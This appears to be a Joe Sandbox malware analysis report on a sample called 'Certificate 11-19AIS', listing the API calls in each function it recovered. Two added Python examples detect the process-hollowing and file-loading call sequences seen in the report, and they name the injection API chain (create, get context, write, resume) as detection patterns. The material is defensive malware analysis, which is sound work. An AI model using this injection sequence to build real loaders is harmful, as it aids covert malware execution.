                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                              • Instruction ID: 88781ea6f4b1eaf21366f230d1160c5eb2a8fd9f6e533cd0deecc4c50aaad200
                                                                              • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                              • Instruction Fuzzy Hash: DF62FC30A146189BEB24CFA4C851BEEB376EF58304F1091A9D21DFB390E7759E81CB59
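Taken together, the two routines recovered from the 00EF0000 region have the API shape of a loader: the function at ef2a88 sleeps 500 ms (Sleep 0x1F4 in its subcall), opens a file with GENERIC_READ (0x80000000) and OPEN_EXISTING (3), allocates with VirtualAlloc, reads the file in with ReadFile and exits on failure; the routine at 00EF2133 creates a process and then pulls the child's 32-bit thread context (0x10007 is CONTEXT_FULL for an x86 context) and memory with Wow64GetThreadContext and ReadProcessMemory, the opening moves of a process-hollowing style injection that the report's "Modifies the context of a thread in another process" and "Writes to foreign memory regions" signatures describe. The script below is an added example and not part of the Joe Sandbox report: it parses API lines in the format the report prints and matches those two ordered call sequences; the sample input reuses the lines printed above, while the VirtualAlloc and ReadFile lines are constructed placeholders (the report shows those calls only in the control-flow graph, without arguments), and the rule for CreateProcessW deliberately does not require CREATE_SUSPENDED because the creation flags are not visible in the report.

```python
import re

# Line shape as printed in the report: "• Api.Module(arg,arg,...), ref: ADDR".
# A "Part of subcall function XXXXXXXX:" prefix is recorded so the call can be
# attributed to the callee rather than to the block that lists it.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

GENERIC_READ = 0x80000000   # dwDesiredAccess bit (winnt.h)
OPEN_EXISTING = 3           # dwCreationDisposition (fileapi.h)


def parse_api_lines(text: str) -> list:
    """Turn report API lines into dicts; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def hex_arg(args, idx):
    """The idx-th argument as int, or None when the report shows it as '?' or omits it."""
    try:
        return int(args[idx], 16)
    except (IndexError, ValueError):
        return None


def ordered_subsequence(calls, wanted) -> bool:
    """True if every predicate in `wanted` is satisfied by some call, in the given order."""
    i = 0
    for c in calls:
        if i < len(wanted) and wanted[i](c):
            i += 1
    return i == len(wanted)


def is_read_open(c) -> bool:
    access = hex_arg(c["args"], 1)
    disposition = hex_arg(c["args"], 4)
    return bool(c["api"] == "CreateFileW" and access is not None
                and access & GENERIC_READ and disposition == OPEN_EXISTING)


RULES = {
    # an existing file opened for reading, then read into memory the loader allocated itself
    "file_to_memory_load": [
        is_read_open,
        lambda c: c["api"] == "VirtualAlloc",
        lambda c: c["api"] == "ReadFile",
    ],
    # a new process created, then its thread context and memory inspected
    "child_process_context_inspection": [
        lambda c: c["api"] == "CreateProcessW",
        lambda c: c["api"] in ("GetThreadContext", "Wow64GetThreadContext"),
        lambda c: c["api"] == "ReadProcessMemory",
    ],
}


def evaluate(text: str) -> dict:
    calls = parse_api_lines(text)
    return {name: ordered_subsequence(calls, seq) for name, seq in RULES.items()}


# Constructed sample: the API lines printed on this page for the two 00EF0000 routines.
# The VirtualAlloc and ReadFile lines are placeholders (arguments unknown, ref set to the
# start of the control-flow-graph block in which the call appears).
SAMPLE = """
  • Part of subcall function 00EF2978: Sleep.KERNELBASE(000001F4), ref: 00EF2989
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EF2BAA
• VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00EF2BD2
• ReadFile.KERNELBASE(?,?,?,?,?), ref: 00EF2BF0
• CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF21C9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF21EB
"""

if __name__ == "__main__":
    for rule, hit in evaluate(SAMPLE).items():
        print(f"{rule}: {'HIT' if hit else 'no match'}")
```

Both rules fire on the sample; feeding only the 007B0000 (AutoIt interpreter) blocks from this page matches neither, which is the point: the interpreter's own file and registry access is benign, the shellcode region's sequence is not.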
                                                                              APIs
                                                                                • Part of subcall function 007B22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007B24F1), ref: 007B2303
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007B25A1
                                                                              • CoInitialize.OLE32(00000000), ref: 007B2618
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0082503A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID: HP
                                                                              • API String ID: 3815369404-295633388
                                                                              • Opcode ID: e4fa6a3b6ec49d7050a840791577d2440b4a5a52254aaa947fb4220224d4ff67
                                                                              • Instruction ID: 6687b68e575914b1b1f70fe69f9698a87584f918326112bfc174de6b8b0745d6
                                                                              • Opcode Fuzzy Hash: e4fa6a3b6ec49d7050a840791577d2440b4a5a52254aaa947fb4220224d4ff67
                                                                              • Instruction Fuzzy Hash: 7171BFB49213818ACF14DFAEA89D594BBA5F799344780416ED20DCBF7ADB38C484CF14
                                                                              APIs
                                                                                • Part of subcall function 007B4517: _fseek.LIBCMT ref: 007B452F
                                                                                • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC65D
                                                                                • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC670
                                                                              • _free.LIBCMT ref: 007FC4DD
                                                                              • _free.LIBCMT ref: 007FC4E4
                                                                              • _free.LIBCMT ref: 007FC54F
                                                                                • Part of subcall function 007D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,007D7A85), ref: 007D1CB1
                                                                                • Part of subcall function 007D1C9D: GetLastError.KERNEL32(00000000,?,007D7A85), ref: 007D1CC3
                                                                              • _free.LIBCMT ref: 007FC557
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction ID: ea03251bef7a40280b2b3a399201f25beacdbc1048542cc1494f95f28b3423dc
                                                                              • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction Fuzzy Hash: 53516BB1904218EFDB259F64DC85BEEBBB9EF48304F1000AEB25DA3341DB755A908F59
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007CEBB2
                                                                                • Part of subcall function 007B51AF: _memset.LIBCMT ref: 007B522F
                                                                                • Part of subcall function 007B51AF: _wcscpy.LIBCMT ref: 007B5283
                                                                                • Part of subcall function 007B51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B5293
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 007CEC07
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007CEC16
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00823C88
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1378193009-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00823725
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0082376F
                                                                                • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                                                • Part of subcall function 007B40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007B40C6
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 007FC72F
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007FC746
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007B5022
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B50CB
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                                                • Part of subcall function 007D81C2: __NMSG_WRITE.LIBCMT ref: 007D81E9
                                                                                • Part of subcall function 007D81C2: __NMSG_WRITE.LIBCMT ref: 007D81F3
                                                                              • __NMSG_WRITE.LIBCMT ref: 007D397A
                                                                                • Part of subcall function 007D821F: GetModuleFileNameW.KERNEL32(00000000,00870312,00000104,00000000,00000001,00000000), ref: 007D82B1
                                                                                • Part of subcall function 007D821F: ___crtMessageBoxW.LIBCMT ref: 007D835F
                                                                                • Part of subcall function 007D1145: ___crtCorExitProcess.LIBCMT ref: 007D114B
                                                                                • Part of subcall function 007D1145: ExitProcess.KERNEL32 ref: 007D1154
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007FC385,?,?,?,?,?,00000004), ref: 007FC6F2
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007FC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007FC708
                                                                              • CloseHandle.KERNEL32(00000000,?,007FC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007FC70F
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              APIs
                                                                              • _free.LIBCMT ref: 007FBB72
                                                                                • Part of subcall function 007D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,007D7A85), ref: 007D1CB1
                                                                                • Part of subcall function 007D1C9D: GetLastError.KERNEL32(00000000,?,007D7A85), ref: 007D1CC3
                                                                              • _free.LIBCMT ref: 007FBB83
                                                                              • _free.LIBCMT ref: 007FBB95
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              APIs
                                                                              • _strcat.LIBCMT ref: 008108FD
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • _wcscpy.LIBCMT ref: 0081098C
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1012013722-0
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 007B3A73
                                                                                • Part of subcall function 007D1405: __lock.LIBCMT ref: 007D140B
                                                                                • Part of subcall function 007B3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007B3AF3
                                                                                • Part of subcall function 007B3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B3B08
                                                                                • Part of subcall function 007B3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,007B3AA3,?), ref: 007B3D45
                                                                                • Part of subcall function 007B3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,007B3AA3,?), ref: 007B3D57
                                                                                • Part of subcall function 007B3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00871148,00871130,?,?,?,?,007B3AA3,?), ref: 007B3DC8
                                                                                • Part of subcall function 007B3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,007B3AA3,?), ref: 007B3E48
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B3AB3
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 924797094-0
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 007DEA29
                                                                              • __close_nolock.LIBCMT ref: 007DEA42
                                                                                • Part of subcall function 007D7BDA: __getptd_noexit.LIBCMT ref: 007D7BDA
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                              • String ID:
                                                                              • API String ID: 1046115767-0
                                                                              • Opcode ID: fe9623f58a77f2d8535127b89cc5fd4216f922ef5855bc0d398d8dafb966a714
                                                                              • Instruction ID: ce0259324e18e1c827ab2f78c6264cb793ece5202264c48bd39a45d965e89114
                                                                              • Opcode Fuzzy Hash: fe9623f58a77f2d8535127b89cc5fd4216f922ef5855bc0d398d8dafb966a714
                                                                              • Instruction Fuzzy Hash: A9119E72815611DAD317BB6488493287A707F81331F2A8243E4685F3E2DBBC8C40CAA1
                                                                              APIs
                                                                                • Part of subcall function 007D395C: __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                                                • Part of subcall function 007D395C: __NMSG_WRITE.LIBCMT ref: 007D397A
                                                                                • Part of subcall function 007D395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                                              • std::exception::exception.LIBCMT ref: 007CF51E
                                                                              • __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                                • Part of subcall function 007D6805: RaiseException.KERNEL32(?,?,0000000E,00866A30,?,?,?,007CF538,0000000E,00866A30,?,00000001), ref: 007D6856
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: 71465822a1805ca8034fcbc58768909d8b310c9960d660d10e769a79e27233dc
                                                                              • Instruction ID: fbcc8d893c1ab6861fc90b1d1393349b014d5e5ef0e1a10e4c25c848d522d62c
                                                                              • Opcode Fuzzy Hash: 71465822a1805ca8034fcbc58768909d8b310c9960d660d10e769a79e27233dc
                                                                              • Instruction Fuzzy Hash: F8F0AF3110422EA7DB04BF98E905EDE77A9AF00394F60402EFA08E2281DBB8D75496E5
                                                                              APIs
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • __lock_file.LIBCMT ref: 007D3629
                                                                                • Part of subcall function 007D4E1C: __lock.LIBCMT ref: 007D4E3F
                                                                              • __fclose_nolock.LIBCMT ref: 007D3634
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 06df9b5aa3da3f8566ceec120b9780717187d6907fb079ab05635562b93e8ded
                                                                              • Instruction ID: ce5779603d622c18a90458243a6c1a446108c43d756247a0421d324aa8fee658
                                                                              • Opcode Fuzzy Hash: 06df9b5aa3da3f8566ceec120b9780717187d6907fb079ab05635562b93e8ded
                                                                              • Instruction Fuzzy Hash: 70F0B471801204EAD7117B75880A76E7BB0AF41731F25815BE465EB3C1CB7CCB019FA6
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF21C9
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF21EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                              • Instruction ID: 2b49212afaa88b808c8e186ca384697038f0b386a4d41f32850064314b402a4f
                                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                              • Instruction Fuzzy Hash: CE12C024E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F81CF5A
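The three calls listed for the function at 00EF0000 (CreateProcessW, then Wow64GetThreadContext, then a 4-byte ReadProcessMemory, all from a non-PE-backed region) are the opening moves of process hollowing, which matches the report's "Modifies the context of a thread in another process" and "Writes to foreign memory regions" signatures. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines written in the report's own "Name.Module(args), ref: addr" notation and scores how much of the hollowing sequence a function's call list covers. The later stages it checks for (unmap, WriteProcessMemory, SetThreadContext, ResumeThread) are the usual continuation of the technique and are not shown in this block of the report; the sample trace is constructed from the three lines above, and reading the argument 00010007 as CONTEXT_FULL (0x10007 on x86) is an inference from the value, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# One Joe Sandbox style API line, e.g.
#   "CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133"
#   "__close_nolock.LIBCMT ref: 007DEA42"        (no argument list)
API_LINE = re.compile(
    r"^(?P<api>[A-Za-z0-9_@:]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

CONTEXT_FULL_X86 = 0x10007  # CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS

# Constructed input: the three API lines of the 0x00EF0000 function as printed
# in the report, in the report's bullet style.
SAMPLE_TRACE = """
• CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF21C9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF21EB
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse an 'APIs' listing into ApiCall records in listing order.
    Bullets, indentation and the 'Part of subcall function X:' prefix are
    stripped; lines that are not API calls ('APIs', 'Memory Dump Source') are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        line = re.sub(r"^Part of subcall function [0-9A-Fa-f]+:\s*", "", line)
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def _has_hex_arg(call: ApiCall, value: int) -> bool:
    """True if any recovered argument equals value ('?' = not recovered by the sandbox)."""
    for a in call.args:
        try:
            if int(a, 16) == value:
                return True
        except ValueError:
            pass
    return False


def hollowing_stages(calls: List[ApiCall]) -> Dict[str, bool]:
    """Record which stages of the process-hollowing pattern occur, in order.
    Everything after create_process only counts once a child process exists."""
    stages = {"create_process": False, "get_context": False, "context_flags_full": False,
              "read_dword_from_child": False, "unmap_image": False,
              "write_child_memory": False, "set_context": False, "resume_thread": False}
    for c in calls:
        if c.api in ("CreateProcessW", "CreateProcessA", "CreateProcessInternalW"):
            stages["create_process"] = True
        elif not stages["create_process"]:
            continue
        elif c.api in ("Wow64GetThreadContext", "GetThreadContext"):
            stages["get_context"] = True
            stages["context_flags_full"] = _has_hex_arg(c, CONTEXT_FULL_X86)
        elif c.api == "ReadProcessMemory" and len(c.args) >= 4 and c.args[3] == "00000004":
            # a single DWORD read of the child is how a loader fetches PEB->ImageBaseAddress
            stages["read_dword_from_child"] = True
        elif c.api in ("NtUnmapViewOfSection", "ZwUnmapViewOfSection"):
            stages["unmap_image"] = True
        elif c.api in ("WriteProcessMemory", "NtWriteVirtualMemory"):
            stages["write_child_memory"] = True
        elif c.api in ("Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"):
            stages["set_context"] = True
        elif c.api in ("ResumeThread", "NtResumeThread"):
            stages["resume_thread"] = True
    return stages


def verdict(stages: Dict[str, bool]) -> str:
    """'hollowing' when the write/resume tail follows the prefix, 'hollowing_prelude'
    when only the create/context/read prefix seen in this report is present, else 'none'."""
    prefix = stages["create_process"] and stages["get_context"] and stages["read_dword_from_child"]
    tail = stages["write_child_memory"] and (stages["set_context"] or stages["resume_thread"])
    if prefix and tail:
        return "hollowing"
    if prefix:
        return "hollowing_prelude"
    return "none"


def analyse(text: str) -> str:
    return verdict(hollowing_stages(parse_api_lines(text)))


if __name__ == "__main__":
    print(analyse(SAMPLE_TRACE))
```

Because the report splits one function's calls across several decompiled blocks, run the scorer over the concatenated API lists of the blocks that share a memory dump source (here the 0x00EF0000 region) rather than over one block at a time; a single block yields only the prelude verdict.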
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 007D2A0B
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __flush__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 4101623367-0
                                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                              • Instruction ID: 77e0c1a457db851ce5a7f4724b4ae1926a1fbef03299b033e381e7bdf900ec0f
                                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                              • Instruction Fuzzy Hash: 9C41C8707007069FDB288E69C89056EB7B6EFA4360B24C52FE845D7342EB78ED438B50
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: 2202d0bf537b36d0b85a16f35779677a5797f86a33618c78f54853acf402ceb1
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 7931B3B5B005059BD718DF58C480A69FBA6FF49340B6486ADE40ACB256DB39EDC1CBD0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
